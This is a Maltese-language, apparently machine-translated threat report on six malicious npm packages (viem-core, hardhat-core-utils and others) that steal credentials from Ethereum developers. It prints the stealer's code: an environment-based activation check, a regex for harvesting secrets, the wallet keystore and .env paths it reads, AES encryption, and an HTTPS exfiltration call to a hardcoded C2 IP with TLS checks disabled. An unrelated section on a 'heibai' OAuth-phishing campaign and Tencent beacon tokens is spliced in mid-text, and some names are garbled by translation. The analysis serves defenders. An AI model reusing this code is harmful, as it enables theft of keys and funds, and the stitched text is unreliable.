TL; DR
Fis-6 ta' Mejju 2026, pubblikatur wieħed tal-npm, namikazesarada010206, imbotta sitt pakketti malizzjużi li jimmiraw lejn l-ekosistema tal-iżviluppaturi Ethereum, Solidity, u DeFi.
Il-pakketti, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, u web3-utils-core, uża ismijiet plawżibbli ddisinjati biex jidhru bħal libreriji ta' għajnuna għal għodod popolari tal-Web3.
Is-sitt pakketti kollha kien fihom l-istess telemetry.js fajl. Il-fajl kien identiku għall-byte fil-cluster kollu, b'SHA-256:
Il-malware ma jiġix esegwit fil-ħin tal-installazzjoni. M'hemm l-ebda preinstall or postinstall ganċ. Minflok, jattiva meta l-pakkett jiġi importat permezz ta' require().
Dak id-dettall huwa importanti.
L-impjant jistenna sakemm żviluppatur fil-fatt juża l-pakkett. Imbagħad jiċċekkja jekk il-workstation tidhirx bħal ambjent ta' żvilupp Ethereum / Solidity reali. Ifittex ċwievet Alchemy jew Infura, ċwievet privati, mnemoniċi, ċwievet tad-deployer, jew direttorju Foundry lokali.
Jekk il-host jaqbel, il-ħalliel jiġbor ċwievet privati SSH, keystores tal-kartieri Foundry / Geth / Brownie, .env* fajls, u varjabbli ambjentali sensittivi. Jikkripta l-pakkett b'AES-256-GCM billi juża passphrase hardcoded u jesfiltrah għal endpoint IPv4 C2 mhux ipproċessat bil-verifika TLS diżattivata.
Is-sistema ta' Twissija Bikrija ta' Malware (MEW) ta' Xygeni kkonfermat is-sitt pakketti kollha bħala malizzjużi. Il-pakkett tar-rapport tat-tneħħija tar-reġistru npm għadu pendenti.
Il-Grupp: Sitt Pakketti, Pubblikatur Wieħed
Il-kont tal-pubblikatur namikazesarada010206 kien marbut mal-indirizz tal-Gmail mhux verifikat namikazesarada010206@gmail.com.
Il-kampanja dehret bħala pubblikazzjoni f'daqqa ta' ġurnata waħda fis-6 ta' Mejju 2026. Is-sitt pakketti kollha ġew verżjoniti bħala 1.0.0, ma kellu l-ebda dipendenza fuq ir-runtime, u bagħat biss tliet fajls:
package.json index.js telemetry.js Huma ddikjaraw ukoll l-istess repożitorju tas-sors:
https://github.com/harunosakura030303-maker/evmchain-config L-ewwel tliet pakketti nqabdu mill-iskanners tal-MEW fl-ewwel pubblikazzjoni. It-tlieta li fadal ġew immarkati bil-forza wara reviżjoni tal-analisti tal-profil npm tal-pubblikatur. Ladarba l-istess byte identiku telemetry.js ġie kkonfermat fil-klaster kollu, dawn ingħalqu bħala malizzjużi skont il-konsistenza.
| Pakkett | verżjoni | npm Ippubblikat | Biljett tal-MEW | verdett |
|---|---|---|---|---|
| viem-core | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | Malicious |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | Malicious |
| hardhat-core-utils | 1.0.0 | 2026-05-06 | #51051 | Malicious |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | Malizzjuż, bil-konsistenza |
| utilitajiet tal-funderija | 1.0.0 | 2026-05-06 | #51071 | Malizzjuż, bil-konsistenza |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | Malizzjuż, bil-konsistenza |
L-istrateġija tal-għoti tal-ismijiet hija sempliċi iżda effettiva.
Dawn il-pakketti ma jimpersonifikawx ismijiet eżatti upstream. Minflok, jużaw suffissi ta' "utilità" plawżibbli bħal -core, -utils, u -utils-coreDan jagħmilhom jidhru bħal libreriji sħab li żviluppatur jista' jistenna li jara ħdejn l-għodda tal-Web3.
| Pakkett Malizzjuż | Mira Leġittima |
|---|---|
| viem-core | viem, klijent popolari ta' Ethereum TypeScript |
| viem-utils-core | ħajja |
| hardhat-core-utils | hardhat, ambjent ta' żvilupp mainstream ta' Solidity |
| evm-utils | Spazju tal-ismijiet tal-għodda ġenerika tal-EVM |
| utilitajiet tal-funderija | funderija, katina ta' għodda tas-Solidità |
| web3-utils-core | web3-utils, assistenti tal-Web3.js |
Dan huwa l-mudell tal-“pakkett supplimentari”: mhux “Jiena l-pakkett reali,” iżda “Nidher qisni għajnuna raġonevoli madwar il-pakkett reali.”
Għall-iżviluppaturi tad-DeFi li qed jimxu malajr, dan huwa biżżejjed biex joħloq riskju.
X'jiġri Meta l-Pakkett Jiġi Importat
Il-katina tal-attakk hija żgħira, intenzjonata, u ffukata fuq ambjenti ta' żvilupp kriptografiku.
M'hemm l-ebda ganċ għall-installazzjoni. Minflok, kull pakkett jinkludi index.js li jesporta l-funzjonalità tal-stub u mbagħad jgħabbi l-modulu tat-telemetrija malizzjuża.
require('./telemetry').init(); Dan ifisser li l-malware jiġi attivat mal-ewwel importazzjoni.
Dan huwa operazzjonalment utli għall-attakkant. Ħafna skanners u sandboxes jiffokaw fuq l-imġiba fil-ħin tal-installazzjoni. Dan il-pakkett jistenna sakemm fil-fatt jintuża minn żviluppatur, skript tal-bini, suite tat-test, jew mogħdija tar-runtime.
Bieb tal-Attivazzjoni: Ixgħel biss fuq Stazzjonijiet tax-Xogħol tal-Iżviluppaturi tal-Web3 Reali
L-aktar parti importanti tal-impjant hija l-bieb tal-attivazzjoni.
Il-malware jivverifika l-varjabbli tal-ambjent li jinstabu komunement fuq magni tal-iżviluppaturi Ethereum / Solidity:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); Jiċċekkja wkoll jekk Foundry jidhirx li hu installat:
fs.existsSync(path.join(os.homedir(), '.foundry')) Jekk l-ebda kundizzjoni ma tkun vera, il-funzjoni tirritorna u ma tagħmel xejn.
Dan jagħmel il-pakkett aktar kwiet f'ambjenti ta' analiżi ġenerika. Sandbox mingħajr Foundry, ċwievet Alchemy, ċwievet Infura, ċwievet privati, jew mnemoniċi jista' jara importazzjoni li tidher li ma tagħmilx ħsara.
Fuq host li jaqbel, il-malware jistenna minn 60 sa 90 sekonda qabel ma jinġabar:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); Id-dewmien inaqqas il-korrelazzjoni ovvja bejn l-importazzjoni u l-esfiltrazzjoni. .unref() Is-sejħa tħalli wkoll lill-proċess ospitanti joħroġ normalment jekk il-pakkett ikun ġie importat fi skript ta' żmien qasir.
Din mhix imġiba storbjuża ta' smash-and-grab. Huwa stealer immirat iddisinjat biex jevita li jaħdem sakemm l-ambjent tal-iżviluppatur ma jkunx ta' min jisraq minnu.
Dak li Jiġbor il-Ħalliel
Ladarba jgħaddi l-bieb tal-attivazzjoni, il-malware jiġbor minn sorsi li huma l-aktar importanti fl-iżvilupp tal-Web3: ċwievet privati, keystores tal-kartieri, kredenzjali tal-iskjerament, sigrieti tal-cloud, tokens npm, u konfigurazzjoni lokali tal-proġett.
| sors | X'Jinġabar |
|---|---|
| proċess.ambjent | Kwalunkwe varjabbli li taqbel /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Fajls li fihom PRIVATE KEY jew BEGIN OPENSSH, inkluż il-kontenut sħiħ tal-fajl |
| ~/.foundry/keystores/* | Fajls tal-maħżen taċ-ċwievet tal-kartiera tal-funderija |
| ~/.ethereum/maħżen taċ-ċwievet/* | Fajls tal-maħżen taċ-ċwievet tal-kartiera Geth |
| ~/.brownie/kontijiet/* | Fajls tal-maħżen taċ-ċwievet tal-kartiera Brownie |
| ${cwd}/.env | Kontenut sħiħ tal-fajl |
| ${cwd}/.env.local | Kontenut sħiħ tal-fajl |
| ${cwd}/.env.produzzjoni | Kontenut sħiħ tal-fajl |
| ${cwd}/.env.development | Kontenut sħiħ tal-fajl |
| os.isem tal-host() | Metadata tal-ospitant |
| kripto.randomUUID() | Identifikatur tal-vittma/sessjoni |
| Data.issa() | Timbru tal-ħin tal-ġbir |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com It-tokens tal-ATTA huma:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 Ma stajniex nikkonfermaw jekk it-telemetrija kinitx l-analitika tal-operatur stess jew kanal monetizzat separatament. It-tokens tal-ATTA huma l-istess fiż-żewġ kampjuni li eżaminajna.
Grupp B: heibai
claude.hk OAuth Phishing + ANTHROPIC_BASE_URL Hijack
Il-kampjun tal-1 ta' April huwa l-fergħa aktar kruda u bikrija tal-kampanja.
heibai:2.1.88-claude.hk-4 ġie ppubblikat minn wuguoqiangvip28, kont maħluq fis-7 ta' Ġunju 2025. Il-pakkett ivverżjoni ruħu espliċitament kontra l-kodiċi leġittimu 2.1.88 Rilaxx antropoġiku.
Ma jinkwetax dwar CA-cert MITM. Minflok, jigdeb lill-utent dwar l-endpoint tal-OAuth.
Iż-żidiet malizzjużi fuq is-sors tal-Kodiċi Claude li nxtered jinkludu:
| sors | X'Jinġabar |
|---|---|
| proċess.ambjent | Kwalunkwe varjabbli li taqbel /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Fajls li fihom PRIVATE KEY jew BEGIN OPENSSH, inkluż il-kontenut sħiħ tal-fajl |
| ~/.foundry/keystores/* | Fajls tal-maħżen taċ-ċwievet tal-kartiera tal-funderija |
| ~/.ethereum/maħżen taċ-ċwievet/* | Fajls tal-maħżen taċ-ċwievet tal-kartiera Geth |
| ~/.brownie/kontijiet/* | Fajls tal-maħżen taċ-ċwievet tal-kartiera Brownie |
| ${cwd}/.env | Kontenut sħiħ tal-fajl |
| ${cwd}/.env.local | Kontenut sħiħ tal-fajl |
| ${cwd}/.env.produzzjoni | Kontenut sħiħ tal-fajl |
| ${cwd}/.env.development | Kontenut sħiħ tal-fajl |
| os.isem tal-host() | Metadata tal-ospitant |
| kripto.randomUUID() | Identifikatur tal-vittma/sessjoni |
| Data.issa() | Timbru tal-ħin tal-ġbir |
Il-lista fil-mira hija speċifika ħafna. Dan mhuwiex serq ġeneriku tal-browser jew scraping wiesa' tal-kredenzjali. Hija mmirata lejn żviluppaturi li jibnu, jittestjaw, jużaw, jew joperaw applikazzjonijiet tal-Ethereum.
L-inklużjoni tal-keystores ta' Foundry, Geth, u Brownie hija speċjalment importanti. Dawn il-fajls jistgħu jirrappreżentaw aċċess dirett għal wallets jew identitajiet ta' skjerament. Jekk l-attakkant jista' jqabbadhom ma' passwords, mnemoniċi, jew sigrieti ambjentali, jista' jkun kapaċi jċaqlaq fondi, jimpersonifika lil min iħaddem, jew jikkomprometti operazzjonijiet ta' smart contract.
Kriptaġġ Qabel l-Esfiltrazzjoni
Il-malware jikkripta d-dejta miġbura qabel ma jibgħatha.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); Il-frażi hardcoded hija:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d Il-payload finali huwa mgeżwer bħala JSON:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} Il-kriptaġġ waħdu ma jagħmilx il-malware aktar avvanzat. Madankollu, jagħmel l-ispezzjoni tan-netwerk aktar diffiċli. Difensur li josserva l-ħruġ jara payload JSON, iżda mhux iċ-ċwievet misruqa, il-fajls tal-kartiera, jew .env kontenut mingħajr il-frażi passkodifikata u l-loġika tad-dekriptaġġ.
Esfiltrazzjoni għal IPv4 C2 mhux ipproċessat
Il-mogħdija tal-esfiltrazzjoni hija hardcoded:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); Il-malware jibgħat id-dejta lil:
https://76.13.37.80:8443/api/v1/telemetry Żewġ dettalji jispikkaw.
L-ewwelnett, is-C2 huwa indirizz IPv4 mhux ipproċessat aktar milli dominju. Dan ineħħi l-ħtieġa għar-reġistrazzjoni tad-dominju u jevita xi skoperti bbażati fuq id-dominju.
It-tieni, il-verifika tat-TLS hija diżattivata b'dan li ġej:
rejectUnauthorized: false Dan jippermetti lill-malware jaċċetta kwalunkwe ċertifikat, inklużi ċertifikati ffirmati minnu nnifsu. Fi kliem ieħor, l-attakkant jikseb trasport kriptat mingħajr ma jkollu bżonn ċertifikat pubbliku validu.
M'hemm l-ebda loġika ta' tentattiv mill-ġdid u l-ebda host ta' riżerva. L-iżbalji jinbelgħu fis-skiet. Dan iżomm il-pakkett kwiet jekk is-C2 ikun offline jew ma jintlaħaqx.
Għaliex Din il-Kampanja Tgħodd
Il-biċċa l-kbira tal-pakketti npm malizzjużi mmirati lejn l-iżviluppaturi jfittxu kredenzjali wesgħin: tokens npm, ċwievet AWS, tokens GitHub, jew .npmrc fajls.
Din il-kampanja tnaqqas il-mira.
Ifittex sinjali li l-magna tappartjeni lil żviluppatur ta' Ethereum jew Solidity. Imbagħad jiġbed eżattament l-assi li huma importanti f'dak l-ambjent: keystores tal-kartieri, ċwievet privati, mnemoniċi, ċwievet tad-deployer, .env fajls, u ċwievet SSH.
Dan jagħmel il-kampanja aktar perikoluża għat-timijiet tal-Web3 milli serq ġeneriku tal-npm.
Infezzjoni b'suċċess tista' tesponi:
- Kartieri tal-iskjerament
- Ċwievet tal-amministrazzjoni tal-kuntratt intelliġenti
- Ċwievet tal-fornitur RPC
- Kredenzjali tal-iskjerament tal-cloud
- tokens tal-pubblikazzjoni npm
- Aċċess SSH għall-iżviluppatur jew l-infrastruttura tal-bini
- Sigrieti tal-proġett maħżuna fi
.envfajls - Ħażniet taċ-ċwievet tal-kartieri għal Foundry, Geth, jew Brownie
L-ismijiet tal-pakketti juru wkoll inġinerija soċjali ċara. Huma jimmiraw lejn l-ekosistema tal-iżviluppaturi tal-Web3 permezz ta' ismijiet ta' għodod familjari: viem, hardhat, foundry, evm, u web3.
L-attur m'għandux għalfejn jikkomprometti l-proġetti reali. Jeħtieġ biss li żviluppatur jinstalla dak li jidher qisu pakkett raġonevoli li jakkumpanja.
Indikaturi ta' Kompromess u Sejbien
| Pakketti u Pubblikatur | |
|---|---|
| Qasam | valur |
| pubblikatur tal-npm | namikazesarada010206 |
| Email tal-pubblikatur | namikazesarada010206@gmail.com |
| Email verifikata | Nru |
| SCM verifikata | Nru |
| Punteġġ tar-reputazzjoni | 1.0 |
| Pakketti | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core |
| verżjonijiet | Kollha 1.0.0 |
| Repożitorju tas-sors | https://github.com/harunosakura030303-maker/evmchain-config |
| Malizzjuż ikkonfermat | Is-sitt pakketti kollha |
| Netwerk | |
|---|---|
| tip | valur |
| Punt tat-tmiem C2 | https://76.13.37.80:8443/api/v1/telemetry |
| C2 IP | 76.13.37.80 |
| Port C2 | 8443/tcp |
| Imġieba tat-TLS | irrifjutaMhux awtorizzat: falz |
| Skema tat-tagħbija | {"v":2,"iv": "d": "t": } |
| Fajls u Hashes | |
|---|---|
| tip | valur |
| telemetrija.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| Tqassim tal-pakkett | pakkett.json, index.js, telemetrija.js |
| Għadd ta' fajls | 3 |
| Daqs totali approssimattiv | 3.4 KB |
Sinjali ta' Attivazzjoni
Il-malware jivverifika dawn il-varjabbli tal-ambjent:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY Jiċċekkja wkoll għal:
~/.foundry/ Mogħdijiet Ospitanti Mmirati
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development Regex tal-Kollezzjoni
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i Noti ta' Sejbien
Diversi regoli jaqbdu din il-kampanja mingħajr il-ħtieġa ta' analiżi sħiħa tal-imġiba.
L-ewwel, skennja l-lockfiles għas-sitt ismijiet ta' pakketti malizzjużi:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core Kwalunkwe partita fi package-lock.json, yarn.lock, pnpm-lock.yaml, Jew node_modules L-istorja għandha tiġi trattata bħala inċident serju.
It-tieni, immonitorja l-proċessi ta' Node.js li jaqraw il-mogħdijiet tal-keystore tal-kartiera:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ Dan rarament ikun imġiba leġittima għal pakkett importat bħala dipendenza ta' għajnuna. Huwa speċjalment suspettuż meta segwit minn attività tan-netwerk 'il barra.
It-tielet, imblokka jew agħti twissija dwar konnessjonijiet HTTPS għal:
76.13.37.80:8443 Speċjalment meta t-triq tat-talba tkun:
/api/v1/telemetry Ir-raba', fittex pakketti npm li jikkombinaw dawn il-karatteristiċi:
- Pubblikatur ġdid jew ta' reputazzjoni baxxa
- Kont tal-Gmail mhux verifikat
- Isem tal-pakkett li jmiss mal-Web3
- L-ebda storja sinifikanti tar-repożitorju
- Tqassim żgħir tal-pakkett
index.jsli jgħabbi fajl tat-telemetrija jew tal-għajnuna- L-ebda dipendenza fuq ir-runtime
- Ġabra ta' varjabbli ambjentali sensittivi
- Aċċess għall-maħżen taċ-ċwievet tal-kartiera
Dan il-mudell huwa aktar utli minn IOC wieħed għaliex il-pakkett li jmiss jista' jibdel l-indirizz IP iżda jżomm l-istess loġika ta' mira.
Lista ta' Kontroll tar-Rispons ta' Kompromess
Jekk żviluppatur uża wieħed mis-sitt pakketti u l-ambjent tiegħu jaqbel mal-bieb tal-attivazzjoni, ittratta l-workstation bħala kompromessa.
Dan jinkludi magni b'Foundry installat, ċwievet Alchemy jew Infura fl-ambjent, ċwievet privati, mnemoniċi, jew ċwievet tad-deployer.
Rispons rakkomandat:
- Skonnettja l-host min-netwerk.
- Ippreserva
node_modules, lockfiles, storja tax-shell, u logs rilevanti għall-forensika. - Dawwar kull par taċ-ċwievet SSH taħt
~/.ssh/. - Dawwar iċ-ċwievet tal-kartiera għal kull keystore taħt
~/.foundry,~/.ethereum, u~/.brownie. - Mexxi l-fondi għal kartieri ġodda.
- Dawwar kull sigriet maħżun fi
.env*fajls fir-repożitorji li fihom ħadem l-iżviluppatur. - Dawwar is-sigrieti tal-ambjent li jaqblu mar-regex tal-kollezzjoni, inklużi ċwievet tal-AWS, tokens npm, tokens tad-deployment, ċwievet tal-API, ċwievet privati, seeds, u mnemoniċi.
- Awditja l-attività ta' cloud, npm, GitHub, fornitur RPC, u blockchain minn meta l-pakkett ġie installat għall-ewwel darba.
- Erġa' agħmel immaġin tal-workstation qabel ma terġa' tużah.
Dak li għandhom jieħdu d-Difensuri
Din il-kampanja turi kif it-typosquatting tal-npm qed jevolvi madwar ekosistemi ta' żviluppaturi ta' valur għoli.
L-attur ma kellux bżonn persistenza. Ma kellhomx bżonn offuskazzjoni. Lanqas biss kellhom bżonn eżekuzzjoni fil-ħin tal-installazzjoni.
Minflok, huma straħu fuq tliet affarijiet:
- Ismijiet plawżibbli tal-pakketti Web3
- Attivazzjoni biss fuq magni reali tal-iżvilupp tal-kripto
- Serq dirett tal-fajls u s-sigrieti li huma l-aktar importanti għall-iżviluppaturi tal-Ethereum
Dan jagħmilha faċli li tintilef il-kampanja f'skennjar wiesa' u perikoluża meta tinżel fl-ambjent it-tajjeb.
Għat-timijiet tal-Web3, il-lezzjoni hija ċara: ittratta l-ismijiet tad-dipendenzi bħala parti mill-mudell ta' theddid tiegħek. Pakkett li jidher qisu helper li ma jagħmilx ħsara xorta jista' jsir l-iqsar triq lejn kompromess tal-kartiera.
Irrapportat lir-reġistru npm. Se naġġornaw din il-kariga meta l-kont tal-pubblikatur u l-pakketti jitneħħew.




